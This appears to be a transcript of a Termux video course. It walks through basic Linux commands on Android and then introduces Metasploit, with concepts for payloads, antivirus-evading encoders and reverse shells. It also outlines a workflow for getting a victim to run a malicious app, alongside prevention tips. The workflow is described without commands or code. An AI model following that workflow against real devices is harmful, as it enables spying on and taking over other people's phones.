Hello everyone, welcome to the first section of this course. Now let's just quickly dive into a section outline. This section is purely based on the understanding of what is termux, and then we'll go through the security features of termux. Next, we're gonna learn what is shell and why we're using the termux. Next, we'll quickly go through its installation process and we'll understand what is F-Droid. What are the various usage of termux and its package management? And lastly, we'll have a short Q&A board. Feel free to throw up all your doubts in Q&A and I would be happy to guide you. So thank you so much for taking up this course. Your journey throughout this course gonna be amazing. Wish you all the best and see you in the next class. Hello everyone, welcome to the class. Now, there are some most frequently asked questions we often encounter. How to use Android for hacking? What is the best app for hacking an Android? The answer to these queries is termux. But there are a lot of misconceptions about this application. Many of us think termux turns the Android into a hacking machine. Well, it's true, but only to a limited extent. The main questions are what is termux and how it works? How to use it? Is it a standalone source of hacking? In today's video, I am going to discuss every single detail about termux. Also, I'll clear all the misconceptions about the termux. We'll find out whether it is a hacking machine or just a normal command line utility. So let's begin. Now, the first question arrives. What is a termux? A termux is a Linux terminal emulator application for Android. A terminal emulator is a program that allows the users to access the command line interface, that is CLI, in a graphical environment. Now, if you have studied the basics of computer, you must know about the shell and command line interface. If not, we have a short video of shell which will clear your all concept regarding shell. Now we'll quickly come across the features of termux. First, termux is secure. It is feature packed. Termux is customizable. Also, termux is explorable. Also, it is with batteries included. Now, can you imagine a more powerful yet elegant pocket calculator than a read-line powered Python console? Up-to-date versions of Perl, Python, Ruby and Node.js are all available. It is ready to scale up. Connect a Bluetooth keyboard and hook up your device to an external display if you need to. Termux supports keyboard shortcuts and has full mouse support. Also, termux is tinkerable. Develop by compiling C files with Clang and build your own projects with CMake and pkgconfig. Both GDB and strands are available if you get stuck and need to debug. So these are the features of termux. Thank you so much for this class. See you in the next class. Now this is a short video of what is shell. A shell is a command line interface, CLI, or you can say a program that takes commands from the user and instructs the operating system to perform tasks on the basis of these commands. I'll come again. A shell is a CLI, that is command line interface, or you can say a program that takes commands from the user and instructs the operating system to perform tasks on the basis of these commands. There are many shells used in different operating systems, like Bourne shell, C shell, Born Again shell. All have a different set of features and command behavior. Most of the Linux distributions have Born Again shell, which is also known as bash, as their default command line. Hello everyone, welcome to the class. Now, the next question is why Termux? Now, we know that Termux is a Linux terminal emulator. But why is it so famous and sometimes also called a hacking machine? Well, that's somehow true and sometimes a piece of false information also. Termux is not a standalone hacking application. As we discussed, it's a program that takes instructions and runs scripts. I'll come once again. As we have discussed, it's a program that takes instructions and runs the scripts. In some Linux distributions like Kali Linux, Parrot OS, we find a lot of tools for penetration testing. Most of them are CLI based and run through the terminal. We can also install various other tools and run different scripts made for penetration testing. So on Android, obviously you get a complete GUI environment where these tools won't work without any command line utility. That is where Termux is used to install such tools on your Android platform. Our Android is also based on a modified Linux kernel. That's why we can use the bash script in it. Also, that's why Termux can easily connect to the file system to perform the majority of the set of features, which allows you to use the Linux command line to install and run various scripts. So that was a wrap of introduction to Termux. Now let's move to installation and basic usage.
Hello everyone, welcome to the class. Now we'll talk about the installation process. There is no complicated process to install the Termux on your smartphone. Termux app is available on Google Play Store. You can download the app and directly install it on your Android phone. Also, there is an alternative way to install Termux, which is called F-Droid. It is actually the fail-safe way to install Termux with less built-in packages. The process is the same as you install any other application on your Android device. Just download, install, and run the application. As discussed in the previous video, we can directly download Termux from Google Play Store. Also, we can download Termux from F-Droid. Now the question is, what is F-Droid? F-Droid is a community-maintained software repository for Android. Similar to the Google Play Store, the main repository hosted by the project contains only free apps. Applications can be browsed, downloaded, and installed from the F-Droid website or client app without the need to register for an account. Anti-features such as advertising, user tracking, or dependencies on non-free software are flagged in app descriptions. The website also offers the source code of applications it hosts, as well as the software running the F-Droid server, allowing anyone to set up their own app repository. Now comes the package management. Termux provides apt and dpkg for package management and installation. Termux is similar in usage to most of the modern Linux distributions, especially Ubuntu and Debian based distros. The only major difference is that you won't find the file system hierarchy standard, that is FHS. The file system hierarchy standard is found in most of the Linux distributions, which means you won't find some directories on the same locations as they are in the Linux distros. Now, we'll come across the usage of various commands. We'll come across all these commands in a practical session. Hello everyone, welcome to the class. In this section, we will come across hands-on basic understanding of terms. This section is very important in learning and understanding the usage of terms. As we all know that if we have a base strong, then only we can make the skyscrapers, right? So without a further ado, let's begin. Till now, we know that Termux is an Android terminal emulator and Linux environment app that works directly with no routing or setup required. A minimum base system is installed automatically and additional packages are available using apt package manager. Learning the usage of Termux won't take a long time. And depending on your interest, within 4-5 days you'll be able to work perfectly with Termux. Now, a few things to remember: a lot of us will be facing errors, and the main reason will be spelling errors. So make sure you type the command perfectly. Now, the minimum requirements. At least you should have a Lollipop version in your Android device for better performance. Let's open Google Play Store and search Termux and install. Make sure you're downloading the correct application. Once it is installed, open Termux in your Android device. You'll see the interface. Make sure your internet connection is on. Hello everyone, welcome to the class. Now let's set up our storage. Whenever we install Termux, we need to give storage permission. So let's type termux-setup-storage. Always make sure you type the correct spelling. Also, it will ask you for allow permission. After allowing, we'll get the storage permission. Now type clear. Clear is used to clear the screen. After this, we'll first update and then upgrade our Termux. Let's understand why we update and upgrade. Update is used to resynchronize the package index files from their source. Say, for example, if we were trying to update Ubuntu Linux, so it will resynchronize the packages from the source, let's say Ubuntu via the internet. And upgrade is used to install the newest version of the packages currently available. Upgrading involves transforming old system into a new system. This may take time depending on your internet speed. So, coming to the conclusion of this video, two things we need to remember after we install Termux in our device. First, we need to provide the storage permissions. And second, we need to update and upgrade Termux. Okay, so I hope till now we all are clear with the things. Now let's catch up in our next video. Thank you so much. Now type clear, and to come out of this Termux, type exit. Hello everyone, welcome to the class. Now let's go through the various commands. First, let's type apt list. List command will print a list of all the packages including information about the versions and the architecture of the package. As you can see, list of packages. Also, I have shared the useful commands in the coming up lectures which will help you to build your understanding. So as we are scrolling up, these are the default tools. We can easily install and uninstall these tools according to our usage. We can use apt install and the package name. Let's say we are using the package Xyle. Other than apt, we can also use pkg install and the package name. Let's suppose we want to get this Xyle package. So type pkg install Xyle. It will ask yes or no. Press yes or y and then enter. You'll see the package is getting downloaded. Now next, let's see whether we can download, we can get the package from apt or not. So this time, last time we did with the pkg, now we'll do with the apt. So apt install the package name. Before that, just apt list and check whether your package has been installed or not. As you can see in front of the Xyle, we can see the installed in a bracket, in a square bracket. So yeah, this package has been installed. Next, let's install another package with pkg or apt. So let's type apt install package name. Say for example, we want to download cmatrix. So cmatrix is based on the screensaver from the Matrix website. It shows text flying in and out in a terminal like a scene in the Matrix movie. Once the package is installed, next we'll do the apt list and check whether it is installed or not. Just scroll up and check. All the packages are in the alphabetical order. So just scroll up and check whether the cmatrix have been installed or not. Yeah, we can see it's now installed. Now next we'll clear the screen and we'll run the package cmatrix.
So as I have already told you, like C-Matrix is based on the screen saver from the Matrix website. Yeah, it shows the text flying in and out the terminal like a scene in the Matrix movie. Now type C-Matrix and press enter. As you can see, the text are flying as a screensaver. Thank you so much and see you in the next class. Hello everyone, welcome to the class. Now one thing which we missed out in the last video, like how to stop C-Matrix. To stop C-Matrix, press Ctrl plus C. It will automatically stop the C-Matrix. Next, to come out, I mean to exit from the terminal, from the Termux terminal, just type EXIT, exit, and press enter. You'll also come out from the terminal, from the Termux terminal. Now, in this video, we're gonna learn how to uninstall or remove the packages from our list, from our apt list. For that, first type apt list. Now, as we can see, C-Matrix is already installed. Yeah, so now type apt remove, that is apt remove and the package name. So apt remove C-Matrix and press enter. It will ask yes or no. Press Y and then hit enter. Now clear the screen and again type apt list. Now just scroll up and check whether that installed option is there or not. As you can see, in front of the C-Matrix, the installed has been removed, which means our package has been. Hello everyone, welcome to the class. Now in this class, we'll come across the various commands in the termux. First, we'll know what is the show command. For that, we'll type apt show and the package name. The show command will give all the details of the packages. Now, let's type the package name vim. So, apt show and the package name, that is vim. So, we'll get the package name, the version, the maintainer, and the installable size. Like the downloadable size also there, the install size also there, all the dependencies, the conflicts, then apt source, also the description, which gives that it is a vi editor. So apt show vim, I means the show command gives us all the details of the packages. We can also try for zip as well. So just clear the screen, apt show, and then type zip. It will give us all the details about the zip file. Like tools for working with zip files is the description, the downloadable size and everything. Thank you so much. Hello everyone, welcome to the class. Now, once go to your file manager and then inside the storage. Make sure in your settings option you have turned on the show hidden files. Once you have turned on the show hidden files, you'll see the hidden files coming up in your screen. Yes, the dot system underscore xy is an example of a hidden file. So hidden file starts with a dot. Alright, now come back to a Termux terminal. Now, if we want to know the version of our package, so we use minus minus version command. Let's example, we want to know our list version. So type ls, that is the package name, then minus minus version. We'll get the full version installed, I mean the current version installed of the list. Yeah, next ls minus a. ls minus a gives us the hidden files list. I mean, if we have just written ls, it will gives us the list of all the files which are not hidden. Yeah. Now, if you type ls minus a, it gives us all the files, I mean the hidden as well as the non-hidden files. Yeah. As we can see, the dot bash underscore history is a hidden file, and the storage is not a hidden file. All right. So as we have also come across, the hidden files starts with dot. So that's why the dot bash underscore history is a hidden file. For that, ls minus a. Now just clear the screen. And now if you want to change the directory, yeah, so we type cd. Cd stands for change directory. And whichever directory you want to go, just type, just write the name of the directory. So I want to go to storage directory. That's why I have written cd, that is change directory forward slash the directory name, that is storage. Hello everyone, welcome to the class. Now in this video we'll cover the various other commands and how to install other packages in Termux. Now let's install Nano. Nano is also a simple text editor like Vim. To install Nano, type apt install Nano and press enter. Once the Nano is installed, we can type ls and ls will provide us the list of files and folders available. Now, as we can see, ls has shown all the list of files and folders. Now, if we want to see what's inside tnet.txt, we need to use the command cat. Now, what is the cat command? Now, cat stands for concatenate, which is one of the most frequently used command in Linux and Unix. Cat command allows us to create single or multiple files and view the contents of the file, concatenate files and redirect output in the terminal or files. So now let's type cat and the file name, that is tnet.txt. As we can see, nothing has showed up in our screen, which means when we have given the command cat tnet.txt, inside the tnet.txt file there is, the file is empty. Now we'll use nano and the file name, that is tnet.txt. So as I've already told you that nano is a text editor. So let's write something inside our text file. As you can see, I have written hey and wish you all the best. Now we have something inside our tnet.txt file. Now to come out of this nano text editor, press Ctrl and X. And then Y. It will save the tnot.txt file. Now if you type cat tnet.txt, you will see whatever we have written inside the nano editor, it will be displayed in the screen. Hello everyone, welcome to the class. Now in this video we'll come across the various other Linux command. First, we'll know what is pwd command. The pwd command is a command line utility for printing the current working directory. It will print the full system path of the current working directory to a standard output. First, just clear the screen and type pwd. As we can see, the pwd command has printed the full system path of the current working directory to a standard output. If we type ls, we'll get all the files and folders inside our present working directory. Now, if we want to change our present working directory from home to some other directory, we'll just type cd, that is change directory forward slash and the directory name. Here we'll be writing the directory name as SD card.
So cd forward slash SD card. And once we ls, we'll get the list of full folders and files inside our SD card. Now if we type pwd, we'll get forward slash SD card as our present working directory. Let's clear the screen, type clear and hit enter. Now our current directory is SD card. Next, let's create some files using touch. So what is touch? The touch command is a standard command used in Unix Linux operating system, which is used to create, change and modify timestamp of a file. So basically with the help of touch, we can create new files. Just type touch and the file name. Now if we go to our file manager, inside the SD card we can see the file the nat.txt has been created. Now if we use the cat command, cat the nat.txt, we can see there is nothing inside our file. Now to add up something inside our file, we'll use the command nano. Nano, we already come across nano as a text editor, so we'll type nano and the file name, that is the nat.txt. Now we are inside the text editor. We'll just write something, then we'll press Ctrl X and yes to come out of this text editor. Now if we do cat the nat.txt, we'll see what's inside it. Hi everyone. Yeah. So let's go to a file manager and check inside the nat. Yes, it is there. So thank you so much. We'll see you in the next class. Continuing our previous video, now how to make a directory or a folder. So first we'll see our present working directory, it is SD card. Clear the screen and type mkdir. It stands for make directory. Make directory and the file name or the folder name. mkdir debian and hit enter. Now if you ls and just scroll up, you will find the directory has been created. Here directory can also be considered as a folder. So mkdir and the name. Now if you just scroll up, you can see the ban has been created. Now clear the screen, and if you just go back to our file manager, we should get the debian folder created there. So let's just come back to file manager, refresh it, yes, and as you can see the debian folder has been created. So this is how we make folders with the help of mk. Hello and welcome to the class. In this video, we'll come across how we can traverse various directories. For example, if we cd and forward slash SD card, we'll and hit enter, and thereafter we'll type ls, we'll see various files and folders inside our SD card. Now, if we want to go inside in any one folder, for example, we want to go inside DCIM, then how we can go? For that, please follow the steps. Now, currently our present working directory is home. We'll type cd forward slash SD card and then ls. Now we want to go inside DCIM. Simply type cd and DCIM. We are simply inside DCIM. If we type pwd, we'll see forward slash SD card forward slash DCIM. Now if you want to go inside the folder, say notes, again we'll type cd forward slash notes or cd notes. Make sure you write the correct spelling. Now if we type pwd, we'll get forward slash SD card, forward slash DCIM and forward slash notes. Now clear the screen. Now we're currently in notes, right? Now if we come out from this folder, simply type cd space dot dot. Now if you type present working directory, you will see the present working directory is SD card DCIM. Now if you want to come out from DCIM folder, we'll again write cd space dot dot. This is how we come out from a folder by folder process. Okay. So now we are in the forward slash SD card. Now again we'll go to the notes and we'll see how to come out directly from note to our home folder. For that, simply type cd and hit enter. As we can see, we currently in the present working directory is notes. We have written cd and now we have come to home.
Hello everyone, welcome to the class. Now, in the previous video, we have learned the CP, that is the copy command. Now, in copy command, we saw that when we are copying a file or a folder from one directory to another directory, it is keeping a record. I mean, it is keeping both the files in both the directories. Like, for example, if we have copied the nat.txt from SD card to home directory, we can find the nat.txt in both the directories, like in SD card also and in home directory as well. But if we use mv command, that is move command is used to to move the one file or folder from one directory completely to the another directory. You won't find, like, if we just move the nat.txt or any file or folder from SD card to home directory, you won't find it from in SD card once it is moved to home directory. Okay, so let's begin the video. And now if you want to move a folder, for that we'll write mv minus v and the folder name and the location. As you can see, in our home directory, I have created a folder named as ZZZZ. Now I want to copy this, I want to move this folder from our home directory to our SD card. So now type mv move minus v for the folder and the folder name, also the location. Like we can see inside the SD card, we have a Debian folder. I want to move this ZZZ into inside the Debian. All right. So there was some, yeah. As you can see, as you can see, we have written mv minus v zzz and we have given the location. As soon as we have pressed enter, it is showing created directory forward slash SD card forward slash Debian and forward slash zzz. Remove directory zzz, which means from home directory zzz has been removed and it has been created inside SD card inside inside the Debian folder. Alright, now if you do ls, you can see that the zzz folder has been removed from the home directory.
Now if you want to move the new age.tablet.txt, it is a file to SD card, and inside the binary, inside ZZZ, you need to type MV, the file name and the location. You can see the new age traveler file has been copied from the home to our SD card directory. As you can see, hello everyone and welcome to the class. Now in this video we're gonna learn the RM, that is the remove command. Okay, so remove a file or a folder, we use RM. To simply remove a file, we use RM and the file name. To remove a folder, we use RM space minus RF and the folder name. Okay, so currently we are inside SD card, and inside SD card we are inside the Debian folder, and inside the Debian folder we are inside ZZZZ. Alright, and we all know that inside ZZZZ we have a txt file that is named as the new age traveler.txt. Now we want to remove the new age traveler.txt. Now we know that to remove a file we write rm as remove command and then the file name. You can also check in the file manager that inside ZZZZ we have the new age traveler. Now type rm and the file name. Once you ls, you can see that the new age traveler.txt file has been removed. Also you can check with the file manager. Now we want to remove the ZZZZ folder. For that, just type cd dot dot, we will be inside the Debian folder. Now type rm minus rf and the folder name. And hit enter. Now if you do ls, you can see that ZZZZ folder has been deleted. Now check in the file manager, refresh it, you will see yes, the folder has been deleted. Everyone, welcome to the class. Now this video gonna be a mix of mk, that is make directory, and a cp, that is copy command. Alright, so in this video we're gonna first make a folder and then we'll copy some files inside that folder. Follow the procedure as shown in the video step by step. Now currently my pwd is in the Debian folder. So first I'll make a directory named as abc. Now inside abc I'll make three text files, that is 1.txt, 2.txt and 3.txt. This is how you can make multiple text files. Just write touch and the text file name. And now inside this abc folder I'll make a directory, a folder named as inside abc. You can distinguish between the file and the folder. The files are in plain white color, and the folders are like dark blue. Alright, so uh, now I want to copy 1.txt inside the inside abc folder. Currently, if I just pwd, my current working directory is abc. Yeah. So now, first, I'll change the directory to inside abc. Now, I'll type cd space dot dot and come out from inside directory, inside abc to simple abc directory. Yeah. Now, I want to copy 1.txt to inside the abc. Okay. So, write the command cp, then the file name 1.txt and the file you want to copy inside. I mean, the folder you want to copy inside. So, cp 1.txt and inside abc. If you ls, you can see that the file is still there because we have used the cp command. Now if we cd and type inside abc and if we ls, we can see 1.txt is inside. Hello everyone and welcome to the class. Now in this video we're gonna learn the uname command. Now first, if you want to know the architecture of your device, type uname minus m. Now this is the architecture of my device. Now if you want to know the kernel of your device, type uname minus a. Also, you can use this uname command from any directory, whether it's home, whether it's SD card, or whether it's anywhere. You'll get the same architecture and the same kernel device. So, now type uname minus a to get your kernel device. I mean the kernel of your device. Yeah. So it's Linux architecture 64 Android. Hello everyone. Welcome to the class. Now, in this video, we're gonna learn the ifconfig command. The ifconfig stands for interface configuration. It is a utility for Linux machines to configure, assign, add, delete, control, and query network interface in Unix or Linux machine. Common Linux users use ifconfig command to assign IP address and network to an interface or to disable or enable a given interface. Simply type ifconfig. If the ifconfig package is not there, just type pkg install, and if you will be able to see the two packages which we want to download. So you can download multiple packages. Just type pkg install busybox and net hyphen tools. Since it is already installed in my termux, so it is showing that the tool is already in the newest version. So just clear the screen. Now type ifconfig. Just a second, my Wi-Fi is off. Yeah. So again type ifconfig. Now as soon as my Wi-Fi gets connected, you will see a WLAN is coming up in my ifconfig. WLAN stands for wireless LAN, that is wireless local area network. Now if you type ifconfig and hit enter, you can see WLAN 0. Now if you want to know what's your public IP address, go to Google and type what's my IP. You'll get your public IP address. Now if you want to know the same public IP address from termux, first of all go to termux and type curl ipconfig.me. As you can see, you're getting the same public IP address as shown in the Google.
Now if curl is not installed in your termux, simply type pkg install curl. Hello everyone and welcome to the class. Now in this video we'll come across the ping command. The Linux ping command is a simple utility used to check whether a network is available and if host is reachable. With this command, you can test if a server is up and running. It also helps the troubleshooting various connectivity issues. The ping command allows you to test your internet connection, check if a network machine is online, and analyze if there are network issues such as dropped packages or high latency. Now we want to check if our internet is up and if we are able to ping google.com or not. For that, simply type ping www.google.com and hit enter. As you can see, we are getting response. Press Ctrl C to end. Everyone, in this video, we're gonna learn the various other commands in Linux. First, we'll come across the echo command. Echo command in Linux is used to display the line of text or string that are passed as an argument. This is a built-in command that is mostly used in shell scripts and batch files to output status text to the screen or a file. Now, our next command is chmod. In Unix-like operating system, the chmod command is used to change the access mode of a file. The name is an abbreviation of change mode, so chmod is an abbreviation of change mode. In chmod, that is change mode, we have operators and modes. The operator is used to specify how the modes of a file should be adjusted. Like if we have a plus operator, it describes that adds the specified modes to the specific classes. If we have minus operator, it removes the specified modes from the specific classes. Yeah, and if you have equal to operator, the modes specify are the mode specified are to be made the exact modes for the specified classes. And for the modes, we have permissions like R, W, and X. R stands for permission to read the file, W stands for the permission to write or delete the file, and X permission is to execute the file. Now first of all, I'll just create an executive file. So just try touch python.py. Also we can add up multiple files, so touch AA, BB, and CC. Also we can make directories, so we can also make directories like A1, B1, C1, and if we ls, we'll see list of files and directories like a.txt, AA, BB, CC, and A1, B1, C1. Now I want to change mode of python.py to full executive mode, so chmod plus x python.py. If we hit enter and ls, we'll see the Python color has been changed to an executive file with full permissions. Yeah. Next, chmod 777, which means the full permission has been given to AA. Even if you do ls, and we'll see that AA has been changed mode. I mean, it is having the full executive mode. Also, for multiple files to get the full permission, just write chmod plus x and star and hit enter. Hello everyone and welcome to the class. Now in this video we'll come across various other Linux commands. First we'll understand what is CAL, that is cal. Cal stands for calendar. If you type CAL and hit enter, you will see the calendar. So today is 4th June 2020. So if calendar is not installed, simply type pkg install util.linux and hit enter. It will install all the necessary utility packages. Since it is already installed, so as you can see, all packages are up to date.
So clear the screen and type again cal. So you'll see the calendar. Next command is df. The df command, short for disk free, is used to display the information related to file systems about total space and available space. If no file name is given, it displays the space available on all currently mounted file systems. Now next, we'll come across the proc command, that is the process. The proc file system provides a method of communication between the kernel space and user space. For example, the GNU version of the process reporting utility PS uses the proc file system to obtain its data without using any specialized system calls. So type cat forward slash proc forward slash CPU. So this will give the full information of the CPU, like the processor, what are the various types of processors are using, their features, the architecture. Hello everyone and welcome to the class. Now in this video we're gonna learn how to install the package git and how to clone from the git repository. And at the end we'll learn how to use the wget command. Now to install git, simply type apt install git and press Y and hit enter. Once our git has been successfully installed, go to the git repository. Just copy the link of any GitHub repository you wanna clone and come back to the Linux terminal. So copy the link and come back to the Linux terminal and type git clone and paste the link. So git clone is primarily used to point to an existing repository and make a clone or copy of that repository in a new directory or in a location. So simply the git clone command copies an existing git repository. So git clone and paste the URL and hit enter. As you can see, the clone has started. To check if our cloning is done or not, simply type ls and hit enter. As you can see, Metasploit in Termux has been successfully cloned. So you can also change the directory to Metasploit in Termux and hit enter. If you ls, you will see all the various files and folders. So if you just simply type cat and read.md, readme.md, you will see how to install this Metasploit underscore termux, I mean Metasploit in termux. So this is the full procedure given. So we'll come across this procedure how to install Metasploit and everything in our coming sections. So this is the simple you know demonstration like how to you know uh, clone from the GitHub repository. So, git clone helps us to clone from the GitHub repository. But if you want to copy a file or a folder from web, how we can do it? For that we use the command wget. So wget command is a Linux command line utility that helps us to download the files from the web. To install wget, simply type apt install wget. Now let's suppose I want to download a file from the web. So for that, simply type wget and paste the URL. Wget and paste the URL. As you can see, the file has been copied from the web. If you ls and see, you can see readme.md.1. This is the file which we have copied from the web. Now clear the screen. Thank you. Hello everyone and welcome to the class. Now we have entered to one of the most exciting section where we'll learn how attackers create payloads and send to the victims and how we can prevent ourselves from such an attack. Now before we dive into Metasploit framework, let's first understand what is penetration testing or simply pen testing. In simple terms, it is a process to identify security vulnerabilities in an application by evaluating the system or network with various malicious techniques. I'll come again. In simple terms, it's the process to identify security vulnerabilities in an application by evaluating the system or network with various malicious techniques. A penetration testing is a method of evaluating the security of a computer. The purpose of this test is to secure important data from outsiders, like hackers who can have unauthorized access to the system. So basically, a penetration testing is a method of evaluating the security of a computer system. The purpose of this test is to secure the important data from outsiders, like hackers who can have unauthorized access to the system. Now the next important question is, why conduct a penetration testing? Now we'll quickly go through four important points. First, government data must be secured while transferring between different systems. Second, protecting your brand by avoiding loss of consumer confidence and business reputation. Conducting a penetration helps us to secure user data. Also, to find the security vulnerabilities in an application. What is a Metasploit framework? The Metasploit project is an open source computer security project which provides an information about the security vulnerabilities and aids in penetration testing and IDS signature development. Now IDS stands for intrusion detection. We'll come across each term in our coming section. Also, Metasploit is a framework which is used for hacking of different kinds of applications, operating systems, web applications and etc. So, the Metasploit framework is a modular penetration testing platform that enables you to write, test, and execute exploit code. The Metasploit framework contains a suite of tools that you can use to test security vulnerabilities, enumerate networks, execute attacks, and evade detection. At its core, the Metasploit framework is a collection of commonly used tools that provide a complete environment for penetration testing and exploit development. So, in simple terms, we can say Metasploit framework is used to find the vulnerabilities of a machine and exploit it, which means hack into the system. So currently there are more than 1500 exploits available. Can you just imagine the amount of impact this framework creates? Now, let's quickly go through the history of Metasploit framework. It was first created by H.D. Murray in 2003 in Perl. And the follow-up project came in 2004, which is known as Metasploit 2.0. In 2007, Metasploit 3.0 was released, and in 2009, Metasploit was acquired by Rapid7. Then, Metasploit Pro and Metasploit Express was developed. Now, the architecture of Metasploit. It is very important to understand the basic structure of Metasploit and how it is designed. We should not directly start with the exploiting targets, right? Let's start with the architecture. In libraries, we have REX, that is Rex, MSF Core, and MSF Base. So Rex, it's basic library for most tasks. So we can say Rex is a basic library for most of the tasks. It handles sockets, protocols, text transformation, and others. MSF Core, it provides the basic API. It defines the Metasploit framework. So MSF Core provides the basic API, but MSF Base provides the friendly API. It provides simplified APIs for the use in the framework. Now, in the modules, we have exploits, auxiliary, payloads, encoders, no operation, that is NOPs. Now let's quickly see the modules: exploits, payloads, encoders, NOPs, that is no operations, and auxiliary. Hello everyone and welcome to the class. Now we'll quickly go through the various terminologies which we come across in computer security. So first, what is a vulnerability? In computer security, a vulnerability is a weakness which can be exploited by a threat actor, such as an attacker. So, a threat actor can be an attacker who performs unauthorized actions within a computer system. To exploit a vulnerability, an attacker must have at least one applicable tool or technique that can connect to a system's weakness. In this frame, vulnerabilities are also known as attack surface. I'll come once again. What is a vulnerability? In computer security, a vulnerability is a weakness which can be exploited by a threat actor. A threat actor can be an attacker who performs unauthorized actions within a computer system. To exploit a vulnerability, an attacker must have at least one applicable tool or technique that can connect to a system weakness. Now, in this frame, vulnerabilities are also known as attack surface. So simply, in simple terms, we can say vulnerability, it is a weakness in a system, a bug which is to be exploited. Next, what is exploit? An exploit is a code that takes advantage of a software vulnerability or security flaw. It is written either by security researchers as a proof of concept, which is also known as POC threat, or by malicious actors for use in their operations. Now, when this is used, exploits allow an intruder to remotely access a network and gain evaluated privileges or move deeper into the network. I'll come once again. An exploit is a code that takes advantage of a software vulnerability or a security flaw. Alright, it is written either by security researchers as a proof of concept, or we can say it is a proof of concept of a threat, that is POC of a threat, or by malicious actors for use in their operations. So when used, exploits allow an intruder to remotely access a network and gain elevated privileges or move deeper into the network. In some cases, an exploit can be used as a part of multi-component attack. Instead of using a malicious file, the exploit may instead drop into a malware, which can include backdoor trojans and spyware that can steal user information from the infected systems. I'll come once again. In some cases, an exploit can be used as a part of multi-component attack. Instead of using a malicious file, the exploit may instead drop another malware, which can include backdoor trojans and spyware that can steal user information from the infected system. So basically, exploit is a piece of a code which is taken into the consideration for the advantage of a vulnerability. Now, a very important terminology, payload. So, what is a payload? What can be done using it? Well, a payload can be considered to be somewhat similar to a virus. A payload is a set of malicious codes that carry crucial information that can be used to hack any device beyond limits. Okay, beyond limits that you can imagine. For example, if you are trying to hack any Android device, then with the help of a payload, we can hack software as well as hardware. Let's take an example. If we hack any Android device, then we can access the camera as well as the microphone of that device. So payload works on the principle of reverse engineering, in the sense that we normally hack any device by finding its vulnerability and then we attack the device. But in this case, the payload itself becomes the vulnerability of the victim's device. So generally, a payload refers to a set of codes which a hacker designs according to his/her requirements. And then with the help of social engineering, which includes defective links, fake sites, etc., the payload is sent to the victim's device or is embedded within an application, probably a legitimate application that the victim downloads. The victim does not have any idea about the payload sent by the hacker, as the payload doesn't show any signs of its presence directly to the victim. Now, the victim grants the application permission that is required for it to be installed. Now, once the application with the embedded payload is installed by the victim, the device gets hacked. Now, the hacker has the permission to access the victim's device, and the embedded payload sends information to the hacker as it is connected to the hacker's PC as well. For example, you can click on photos using the camera, access the microphone, and many more things. So, in simple terms, payload, it is another piece of code that is executed through a given exploit, and it lets us control a computer system after it's been exploited. Now, we'll quickly go through the module of the architecture of our Metasploit. First, encoder. Encoders are used to evade the antivirus softwares and firewall. However, it has no effect on the functionality of the exploit. So some popular encoders are next, NOPs, which is a short form of no operation. So, no operation keep the payload sizes consistent, ensuring that validly executable by the processor. Basically, it makes the payload stable. Next, we have auxiliary. It provides additional functionality like scanning, fuzzing, and information gathering. Next, payload. So, in payloads, we have three types: singles, stagers, and stages. So, in single, payloads that are self-contained and completely standalone, that is, as simple as adding user to the target system on running
For example, say calculator.exe. So singles are usually standalone. Next, stages. Set up a network connection between the attacker and victim and are designed to be small and reliable. In stages, payload is divided into stages. And when we come to the stages, it's a payload components that are downloaded by the stagers module. So we can say stages are components of stager module. Okay. Now before we go into what is bind TCP shell, first of all, let's understand what is shell. Shell can simply be described as a piece of code or program which can be used to gain the code or command execution of a device like servers, mobile phones, etc. I'll come once again. Shell can simply be described as a piece of code or program which can be used to gain code or command execution on a device like servers, mobile phones, etc. So now there are types of shells. Okay, first we have bind shell and then we have reverse shell. So coming to the bind shell. Bind shell is a type of shell in which the target machine opens up communication port or a listener on the victim machine and waits for an incoming connection. The attacker then connects to the victim machine's listener, which then leads to code or command execution of the server. So in simple terms, we can say in bind TCP shell, we have, in case of bind TCP, an exploit opens a vulnerable port in the victim's machine and then it waits for it waits for the connection from the attacker. Okay. And next we have bind reverse shell. So what is a reverse shell? A reverse shell is a type of shell in which the target machine communicates back to the attacking machine. The attacking machine has a listener port on which it receives the connection, which by using code or command execution is achieved. So we can say in case of bind reverse TCP, the target machine communicate back to attacker machine. The attacker machine has listening port open on which it receives the connection. Hello everyone and welcome to the class. Now we are nearly to the end of the basic understanding of what is Metasploit framework and we are all ready to start the practicals. So before that, we'll quickly go through the three initial steps which are required. First, we'll start the post JRE SQL service. Then we'll make sure that MSF database is running. And then we'll launch the Metasploit framework by typing in MSF console. These are the three initial steps. Also, the MSF Venom steps. First, we'll create a malicious file. Then start the payload handler. Get victim to run the malicious file. Now, few important ways, how you can prevent these attacks. It is very important. Okay, so first, don't download files from unknown source. Always run the latest version of software or operating system. And don't click on random links on the internet. These are the ways to prevent these attacks. Okay, so make sure you remember all these points because these are the very key and the basic important points from which you can prevent yourself from getting hacked. Okay, so once again I'll come across these 3 points. First, don't download files from any unknown source. We have Google Play Store, we have App Store. Download from them. Always run the latest version of software or operating system and don't click on any random links on the internet. Lastly, be smart. Don't get social engineered by someone. Okay. Now coming to the conclusion part. These were some of the basic Metasploit attacks. The point was not only to teach you that something like happens, but also about how to prevent it. Also,
Whatever you're gonna be taught in this course, it is purely for education purpose. I am not responsible for any illegal things you conduct in future. Thank you so much. See you in the practical section. Hello everyone and welcome to the class. Now in this class, we'll install CPU-Z. So, CPU-Z is completely free tool that will help you view all your device's hardware information. It works just like a more popular version of the program made for Windows or PC. The application will give you instant information about the name, architecture, and clocks, that is, core speed and multiplier of each of your system's device. Similarly, it will display information about the make and model of the device, screen resolution, and RAM memory. CPU-Z also offers up battery details, level, state, temperature, voltage, etc. Best of all, and different from many similar applications, CPU-Z doesn't require any special permissions to access and show this information. So, CPU-Z is an excellent hardware information tool for Windows and now for Android as well. Although it's still in beta, the speed and precision with which it offers information makes it a fantastic program. Hello everyone and welcome to the class. Here we'll learn first how to install Metasploit in our Android device using the help of Termux. Follow the procedure step by step as demonstrated in the video lecture. First, we'll update and upgrade Termux. Please follow the procedure step by step as demonstrated in the video lecture. First we'll do pkg install unstable repo and then we'll install Metasploit. Press Y. Now Metasploit it will take around 357 MB. So yeah, it will take some time depending on your internet speed. So from here onwards, you can wait and watch the installation procedure or move your pointer towards the last few seconds of the video where you will see the installation is done. So if you face any problem, feel free to reach out. Just a quick reminder, when we have successfully installed the Metasploit package and Metasploit framework installation finished is shown in our screen, there at the top you can see the command for database server. Make sure you copy the command and save it in Notepad. It will be in use while we are generating the payload.
